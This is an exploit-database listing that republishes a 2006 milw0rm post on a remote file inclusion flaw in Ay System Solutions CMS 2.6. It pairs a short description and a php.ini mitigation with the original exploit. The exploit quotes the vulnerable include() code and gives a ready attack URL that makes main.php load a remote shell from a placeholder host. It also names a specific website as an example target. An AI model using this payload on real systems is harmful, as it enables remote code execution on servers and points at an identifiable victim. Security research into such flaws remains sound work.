header-logo
Suggest Exploit
vendor:
Ay System Solutions CMS
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Ay System Solutions CMS
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: NO
Related CWE: N/A
CPE: a:aysad:ay_system_solutions_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Ay System Solutions CMS <= v2.6 (main.php) Remote File Inclusion Exploit

A vulnerability exists in Ay System Solutions CMS version 2.6 and prior. The vulnerability is due to the 'manage/template/standard/main.php' script not properly sanitizing user-supplied input to the 'path[ShowProcessHandle]' parameter. This can be exploited to include arbitrary files from remote hosts by passing a URL in this parameter. Successful exploitation requires that 'allow_url_include' is set to 'On' in the 'php.ini' file.

Mitigation:

Disable 'allow_url_include' in the 'php.ini' file.
Source

Exploit-DB raw data:

#==============================================================================================
#Ay System Solutions CMS <= v2.6 (main.php) Remote File Inclusion Exploit
#===============================================================================================
#                                                                           
#Critical Level : Dangerous                                                 
#                                                                           
#Venedor site : http://www.aysad.net/            
#                                                                            
#Version : 2.6                                                 
#                                                              
#================================================================================================
#Bug in : manage/template/standard/main.php
#
#Vlu Code :
#--------------------------------
#     <?
#                include($path["ShowProcessHandle"]);
#     ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/manage/template/standard/main.php?path[ShowProcessHandle]=http://SHELLURL.COM?
#
#Example : http://site.turkradyosu.com
#
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================

# milw0rm.com [2006-08-27]